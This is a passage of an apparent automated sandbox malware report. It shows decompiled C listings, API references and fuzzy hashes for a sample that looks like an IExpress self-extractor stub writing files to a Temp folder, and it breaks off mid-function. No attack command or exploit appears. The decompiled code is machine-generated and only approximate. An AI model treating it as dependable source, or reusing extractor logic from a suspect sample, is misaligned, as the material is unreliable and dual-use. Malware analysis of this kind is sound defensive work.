                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: cf42bc250a4c2b89babe4fb0115353ee168301ec2179870781915e2f9d0f3ffa
                                                                                                                                                                                                        • Instruction ID: 2de399e690c8c0904e94124af77c3b1b3f240e21489306c4deab0dfea9a3b32d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf42bc250a4c2b89babe4fb0115353ee168301ec2179870781915e2f9d0f3ffa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D01D1B57003953BF7243A6B8C86F7B218EDBD4799F044029B705E52C09EA8DC414175
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00DE19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v520;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t27 = __ebx;
                                                                                                                                                                                                        				_t11 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                        				_t34 = _a4;
                                                                                                                                                                                                        				_t14 = _a8 - 0x110;
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					_t32 = GetDesktopWindow();
                                                                                                                                                                                                        					E00DE43D0(_t34, _t15);
                                                                                                                                                                                                        					_v520 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xde9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                        					MessageBeep(0xffffffff);
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if(_t14 != 1) {
                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t32 = _a12;
                                                                                                                                                                                                        						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							EndDialog(_t34, _t32);
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							_t23 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x00de19e0
                                                                                                                                                                                                        0x00de19e0
                                                                                                                                                                                                        0x00de19eb
                                                                                                                                                                                                        0x00de19f2
                                                                                                                                                                                                        0x00de19f9
                                                                                                                                                                                                        0x00de19fc
                                                                                                                                                                                                        0x00de1a01
                                                                                                                                                                                                        0x00de1a2a
                                                                                                                                                                                                        0x00de1a2e
                                                                                                                                                                                                        0x00de1a3e
                                                                                                                                                                                                        0x00de1a4f
                                                                                                                                                                                                        0x00de1a62
                                                                                                                                                                                                        0x00de1a6a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1a03
                                                                                                                                                                                                        0x00de1a06
                                                                                                                                                                                                        0x00de1a20
                                                                                                                                                                                                        0x00de1a20
                                                                                                                                                                                                        0x00de1a08
                                                                                                                                                                                                        0x00de1a08
                                                                                                                                                                                                        0x00de1a14
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1a16
                                                                                                                                                                                                        0x00de1a18
                                                                                                                                                                                                        0x00de1a70
                                                                                                                                                                                                        0x00de1a72
                                                                                                                                                                                                        0x00de1a72
                                                                                                                                                                                                        0x00de1a14
                                                                                                                                                                                                        0x00de1a06
                                                                                                                                                                                                        0x00de1a81

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00DE1A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00DE1A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00DE1A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00DE1A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 00DE1A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: d339cfbbb397c40eec58dabe64057f389feca4f51ec6f797e4adde02de35b566
                                                                                                                                                                                                        • Instruction ID: 5c419e886796baf7ea5f9dbbd448de1f85dc95f6154a50b1fd593889423711a5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d339cfbbb397c40eec58dabe64057f389feca4f51ec6f797e4adde02de35b566
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6411A53160128A9FDB10FF68DD48ABE77B8EF49310F108164F516D6290DA30AE01DBB5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE7155() {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct _FILETIME _v16;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                        				_t23 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                        					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                        					_t39 = _t36;
                                                                                                                                                                                                        					if(_t36 == 0xbb40e64e || ( *0xde8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                        						_t36 = 0xbb40e64f;
                                                                                                                                                                                                        						_t39 = 0xbb40e64f;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xde8004 = _t39;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t37 =  !_t36;
                                                                                                                                                                                                        				 *0xde8008 = _t37;
                                                                                                                                                                                                        				return _t37;
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x00de715d
                                                                                                                                                                                                        0x00de7161
                                                                                                                                                                                                        0x00de7165
                                                                                                                                                                                                        0x00de7178
                                                                                                                                                                                                        0x00de7182
                                                                                                                                                                                                        0x00de718e
                                                                                                                                                                                                        0x00de7197
                                                                                                                                                                                                        0x00de71a0
                                                                                                                                                                                                        0x00de71b1
                                                                                                                                                                                                        0x00de71b8
                                                                                                                                                                                                        0x00de71c4
                                                                                                                                                                                                        0x00de71c7
                                                                                                                                                                                                        0x00de71cb
                                                                                                                                                                                                        0x00de71d5
                                                                                                                                                                                                        0x00de71da
                                                                                                                                                                                                        0x00de71da
                                                                                                                                                                                                        0x00de71dc
                                                                                                                                                                                                        0x00de71dc
                                                                                                                                                                                                        0x00de71e2
                                                                                                                                                                                                        0x00de71e5
                                                                                                                                                                                                        0x00de71ee

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00DE7182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00DE7191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00DE719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00DE71A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00DE71B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: f57fd667806ca6f3766f87ea2b5ea99c84fb3978930e78f0110c85659ffe656d
                                                                                                                                                                                                        • Instruction ID: e2744e99d347a0702358c494093b8119e1418c03141d56d68607a7e38576cdf1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f57fd667806ca6f3766f87ea2b5ea99c84fb3978930e78f0110c85659ffe656d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63114C71D05389DFCB10EFB8DA88A9EB7F4EF58311FA54855E805EB310EA309E049B61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                        			E00DE63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				long _v272;
                                                                                                                                                                                                        				void* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                        				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_v276 = _a16;
                                                                                                                                                                                                        				_t37 = 1;
                                                                                                                                                                                                        				E00DE1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                        				E00DE658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                        				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                        					_t28 = _a4;
                                                                                                                                                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                        						 *0xde9124 = 0x80070052;
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					CloseHandle(_t39);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					 *0xde9124 = 0x80070052;
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                        			}















                                                                                                                                                                                                        0x00de63cb
                                                                                                                                                                                                        0x00de63d2
                                                                                                                                                                                                        0x00de63d8
                                                                                                                                                                                                        0x00de63ea
                                                                                                                                                                                                        0x00de63f3
                                                                                                                                                                                                        0x00de6401
                                                                                                                                                                                                        0x00de6402
                                                                                                                                                                                                        0x00de6410
                                                                                                                                                                                                        0x00de6415
                                                                                                                                                                                                        0x00de6433
                                                                                                                                                                                                        0x00de6438
                                                                                                                                                                                                        0x00de6449
                                                                                                                                                                                                        0x00de6463
                                                                                                                                                                                                        0x00de646d
                                                                                                                                                                                                        0x00de6477
                                                                                                                                                                                                        0x00de6477
                                                                                                                                                                                                        0x00de647a
                                                                                                                                                                                                        0x00de643a
                                                                                                                                                                                                        0x00de643a
                                                                                                                                                                                                        0x00de6444
                                                                                                                                                                                                        0x00de6444
                                                                                                                                                                                                        0x00de6492

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00DE642D
                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00DE645B
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00DE647A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00DE63EB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                        • API String ID: 1065093856-2493987848
                                                                                                                                                                                                        • Opcode ID: 35d402c93dcad0e4dc1ee86b9e0c6b33117e227c4db427ec72db1196dec08bf2
                                                                                                                                                                                                        • Instruction ID: fc77d3da85d66b4071f0c2488ef0c1f8808795b3eb1aa14ac30acd2577b146c2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35d402c93dcad0e4dc1ee86b9e0c6b33117e227c4db427ec72db1196dec08bf2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F121C071A00259ABDB10EF26DCC5FEA7768EB54354F1041A9F585A7280DAB0AD848FB4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                        				void _t24;
                                                                                                                                                                                                        				struct HWND__* _t25;
                                                                                                                                                                                                        				struct HWND__* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                                        					_t22 = _t33;
                                                                                                                                                                                                        					_t27 = _t22 + 1;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t6 =  *_t22;
                                                                                                                                                                                                        						_t22 = _t22 + 1;
                                                                                                                                                                                                        					} while (_t6 != 0);
                                                                                                                                                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                        					 *_t34 = _t24;
                                                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                                                        						_t28 = _t33;
                                                                                                                                                                                                        						_t19 = _t28 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t9 =  *_t28;
                                                                                                                                                                                                        							_t28 = _t28 + 1;
                                                                                                                                                                                                        						} while (_t9 != 0);
                                                                                                                                                                                                        						E00DE1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                        						_t11 =  *0xde91e0; // 0x818e88
                                                                                                                                                                                                        						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                        						 *0xde91e0 = _t34;
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t25 =  *0xde8584; // 0x0
                                                                                                                                                                                                        					E00DE44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					LocalFree(_t34);
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 =  *0xde8584; // 0x0
                                                                                                                                                                                                        				E00DE44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}















                                                                                                                                                                                                        0x00de47e8
                                                                                                                                                                                                        0x00de47f0
                                                                                                                                                                                                        0x00de47f4
                                                                                                                                                                                                        0x00de480f
                                                                                                                                                                                                        0x00de4811
                                                                                                                                                                                                        0x00de4814
                                                                                                                                                                                                        0x00de4814
                                                                                                                                                                                                        0x00de4816
                                                                                                                                                                                                        0x00de4817
                                                                                                                                                                                                        0x00de4829
                                                                                                                                                                                                        0x00de482b
                                                                                                                                                                                                        0x00de482f
                                                                                                                                                                                                        0x00de484f
                                                                                                                                                                                                        0x00de4852
                                                                                                                                                                                                        0x00de4855
                                                                                                                                                                                                        0x00de4855
                                                                                                                                                                                                        0x00de4857
                                                                                                                                                                                                        0x00de4858
                                                                                                                                                                                                        0x00de4860
                                                                                                                                                                                                        0x00de4865
                                                                                                                                                                                                        0x00de486a
                                                                                                                                                                                                        0x00de486f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4876
                                                                                                                                                                                                        0x00de4831
                                                                                                                                                                                                        0x00de4841
                                                                                                                                                                                                        0x00de4847
                                                                                                                                                                                                        0x00de480b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de480b
                                                                                                                                                                                                        0x00de47f6
                                                                                                                                                                                                        0x00de4806
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00DE4E6F), ref: 00DE47EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00DE4823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00DE4847
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00DE4851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-2493987848
                                                                                                                                                                                                        • Opcode ID: c1303d133147995a13791d59eaca0ad3c384d614385501a51af47bc2f140104c
                                                                                                                                                                                                        • Instruction ID: 546a32c5669a5af6136a37afa8ddba6e29372ced61bc171ce766570d0cc589b7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1303d133147995a13791d59eaca0ad3c384d614385501a51af47bc2f140104c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F01102B92047C26FE714BF259C98F763B5AEB85300F08851DEA86CB381DA359C068670
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE3680(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct tagMSG _v36;
                                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                                                        				_t16 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                        					if(_t8 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							if(_v36.message != 0x12) {
                                                                                                                                                                                                        								DispatchMessageA( &_v36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t16 = 1;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                        						} while (_t8 != 0);
                                                                                                                                                                                                        						if(_t16 == 0) {
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t8;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x00de368c
                                                                                                                                                                                                        0x00de368f
                                                                                                                                                                                                        0x00de3691
                                                                                                                                                                                                        0x00de369f
                                                                                                                                                                                                        0x00de36a7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de36ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de36bc
                                                                                                                                                                                                        0x00de36bc
                                                                                                                                                                                                        0x00de36c0
                                                                                                                                                                                                        0x00de36cb
                                                                                                                                                                                                        0x00de36c2
                                                                                                                                                                                                        0x00de36c4
                                                                                                                                                                                                        0x00de36c4
                                                                                                                                                                                                        0x00de36da
                                                                                                                                                                                                        0x00de36e0
                                                                                                                                                                                                        0x00de36e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de36e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de36ba
                                                                                                                                                                                                        0x00de36ed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00DE369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE36B2
                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 00DE36CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE36DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: 2f3808ff6ffe1de1d9faf06c2cb80fa1a4888f088115049dc56af98be497ba61
                                                                                                                                                                                                        • Instruction ID: 97c493b8f82b30ae5434fed6ce1b6e71f225d5f25b883a33cadb1fb3b164dff4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f3808ff6ffe1de1d9faf06c2cb80fa1a4888f088115049dc56af98be497ba61
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0001447690039577DB306AAB5C4CEFB7B7CEB85B10F14011DB915E7280D561D644C671
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00DE6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                        				struct HRSRC__* _t6;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t23 =  *0xde9a3c; // 0xde0000
                                                                                                                                                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E00DE44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t24 = _a16;
                                                                                                                                                                                                        				} else {
